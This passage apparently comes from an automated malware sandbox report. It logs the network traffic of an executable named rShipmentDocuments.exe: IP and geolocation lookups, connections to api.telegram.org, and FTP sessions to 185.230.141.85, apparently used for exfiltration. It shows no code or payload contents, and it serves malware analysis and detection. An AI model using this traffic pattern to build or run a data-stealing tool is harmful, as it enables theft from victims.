                                                    Oct 11, 2024 09:35:25.983186007 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:25.987936020 CEST8049756132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.318897963 CEST8049755132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.320190907 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.320231915 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.320909977 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.321253061 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.321271896 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.361536980 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.655930996 CEST8049756132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.657229900 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.657279015 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.657625914 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.657860041 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.657867908 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.705290079 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.789305925 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.791992903 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.792025089 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.934521914 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.934629917 CEST44349757188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:26.938364029 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.961669922 CEST49757443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:26.974071980 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.975222111 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.979430914 CEST8049755132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.980226994 CEST8049759132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:26.982361078 CEST4975580192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.982400894 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.983357906 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:26.988234997 CEST8049759132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.112709999 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.158407927 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.249295950 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.249306917 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.360826969 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.360909939 CEST44349758188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.361068964 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.384385109 CEST49758443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.400655031 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.400836945 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.405425072 CEST8049760132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.405509949 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.405859947 CEST8049756132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.405917883 CEST4975680192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.408684969 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:27.413464069 CEST8049760132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.674367905 CEST8049759132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:27.675632000 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.675678968 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.675847054 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.675996065 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:27.676014900 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:27.721035004 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.071233988 CEST8049760132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.073016882 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.073061943 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.073185921 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.073453903 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.073472977 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.111649990 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.133369923 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.135478020 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.135500908 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.278449059 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.278543949 CEST44349761188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.278601885 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.279347897 CEST49761443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.283052921 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.284153938 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.288693905 CEST8049759132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.288758039 CEST4975980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.289472103 CEST8049763132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.289540052 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.289654970 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.295228958 CEST8049763132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.536572933 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.537975073 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.538007021 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.684468031 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.684572935 CEST44349762188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.684621096 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.685015917 CEST49762443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.688519001 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.689522028 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.693902969 CEST8049760132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.693969011 CEST4976080192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.694433928 CEST8049764132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.694508076 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.694603920 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:28.699481010 CEST8049764132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.953393936 CEST8049763132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:28.954476118 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.954511881 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:28.954582930 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.954791069 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:28.954807997 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.002127886 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:29.394510031 CEST8049764132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:29.395595074 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.395633936 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.395787954 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.396030903 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.396049976 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.418128014 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.419537067 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.419564962 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.439764977 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:29.560801029 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.560872078 CEST44349765188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.561121941 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.561700106 CEST49765443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.577332020 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:29.582446098 CEST8049763132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:29.582602024 CEST4976380192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:29.585438013 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:29.585545063 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:29.586013079 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:29.586555004 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:29.586594105 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:29.852252007 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:29.892411947 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:29.892436028 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.000144005 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.000262976 CEST44349766188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.001717091 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.012231112 CEST49766443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.016028881 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.017163992 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.021065950 CEST8049764132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:30.021215916 CEST4976480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.023622990 CEST8049768132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:30.023682117 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.023770094 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:30.028537035 CEST8049768132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:30.230626106 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.230719090 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.232331991 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.232352972 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.232732058 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.234064102 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.275410891 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.479307890 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.479408026 CEST44349767149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:30.479485035 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.485341072 CEST49767443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:30.688242912 CEST8049768132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:30.689893007 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.689960003 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.690047026 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.690274000 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:30.690288067 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:30.736502886 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:31.373198032 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:31.374777079 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:31.374804974 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:31.523684025 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:31.523796082 CEST44349770188.114.96.3192.168.2.4
                                                    Oct 11, 2024 09:35:31.523894072 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:31.524333954 CEST49770443192.168.2.4188.114.96.3
                                                    Oct 11, 2024 09:35:31.532440901 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:31.533176899 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:31.533231020 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:31.533718109 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:31.533718109 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:31.533763885 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:31.538187027 CEST8049768132.226.247.73192.168.2.4
                                                    Oct 11, 2024 09:35:31.538240910 CEST4976880192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:32.159507036 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.159591913 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:32.160963058 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:32.160975933 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.161223888 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.168340921 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:32.211443901 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.442162991 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.442223072 CEST44349773149.154.167.220192.168.2.4
                                                    Oct 11, 2024 09:35:32.442270994 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:32.445235014 CEST49773443192.168.2.4149.154.167.220
                                                    Oct 11, 2024 09:35:35.949058056 CEST4973980192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:36.125556946 CEST4920321192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:36.131467104 CEST2149203185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:36.131584883 CEST4920321192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:36.139403105 CEST4920321192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:36.144942045 CEST2149203185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:36.145025969 CEST4920321192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:37.784018040 CEST4974480192.168.2.4132.226.247.73
                                                    Oct 11, 2024 09:35:37.930104971 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:37.936006069 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:37.936126947 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:38.569251060 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:38.569528103 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:38.576181889 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:38.792526960 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:38.792690039 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:38.799061060 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.098913908 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.099127054 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:39.104547024 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.320677042 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.320897102 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:39.327207088 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.653044939 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.653198004 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:39.660329103 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.875978947 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:39.876336098 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:39.881717920 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.098352909 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.098804951 CEST4920549693192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:40.103694916 CEST4969349205185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.103763103 CEST4920549693192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:40.103816032 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:40.109006882 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.712950945 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.713203907 CEST4920549693192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:40.713260889 CEST4920549693192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:40.718409061 CEST4969349205185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.718453884 CEST4969349205185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.718482971 CEST4969349205185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.718516111 CEST4969349205185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.718543053 CEST4969349205185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.718569994 CEST4969349205185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.718621969 CEST4969349205185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.718755960 CEST4920549693192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:40.767746925 CEST4920421192.168.2.4185.230.141.85
                                                    Oct 11, 2024 09:35:40.935658932 CEST2149204185.230.141.85192.168.2.4
                                                    Oct 11, 2024 09:35:40.986507893 CEST4920421192.168.2.4185.230.141.85

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 11, 2024 09:35:16.010059118 CEST5204753192.168.2.41.1.1.1
                                                    Oct 11, 2024 09:35:16.016813993 CEST53520471.1.1.1192.168.2.4
                                                    Oct 11, 2024 09:35:17.360287905 CEST5977353192.168.2.41.1.1.1
                                                    Oct 11, 2024 09:35:17.367681980 CEST53597731.1.1.1192.168.2.4
                                                    Oct 11, 2024 09:35:29.577244043 CEST5357553192.168.2.41.1.1.1
                                                    Oct 11, 2024 09:35:29.584856033 CEST53535751.1.1.1192.168.2.4
                                                    Oct 11, 2024 09:35:33.619982958 CEST53500581.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 11, 2024 09:35:16.010059118 CEST192.168.2.41.1.1.10xd02aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:17.360287905 CEST192.168.2.41.1.1.10x5f83Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:29.577244043 CEST192.168.2.41.1.1.10xdd29Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 11, 2024 09:35:16.016813993 CEST1.1.1.1192.168.2.40xd02aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                    Oct 11, 2024 09:35:16.016813993 CEST1.1.1.1192.168.2.40xd02aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:16.016813993 CEST1.1.1.1192.168.2.40xd02aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:16.016813993 CEST1.1.1.1192.168.2.40xd02aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:16.016813993 CEST1.1.1.1192.168.2.40xd02aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:16.016813993 CEST1.1.1.1192.168.2.40xd02aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:17.367681980 CEST1.1.1.1192.168.2.40x5f83No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:17.367681980 CEST1.1.1.1192.168.2.40x5f83No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                    Oct 11, 2024 09:35:29.584856033 CEST1.1.1.1192.168.2.40xdd29No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • reallyfreegeoip.org
                                                    • api.telegram.org
                                                    • checkip.dyndns.org

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449733132.226.247.73807768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:16.036529064 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:16.912301064 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:16 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: c4874257964a303b893ea68cb1d0ec0b
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Oct 11, 2024 09:35:16.955323935 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:17.159961939 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:17 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 2bb44a9af14d57792bf6214d8e8e14d5
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Oct 11, 2024 09:35:19.588538885 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:19.794353008 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 962865c0a07ad0e17457b6d349faa106
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449737132.226.247.73808136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:19.655952930 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:20.348445892 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: e73e8903fdfe815900b754a756349417
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Oct 11, 2024 09:35:20.352443933 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:20.562414885 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 4bd78b2ea030520662e3fe02a1b5ff89
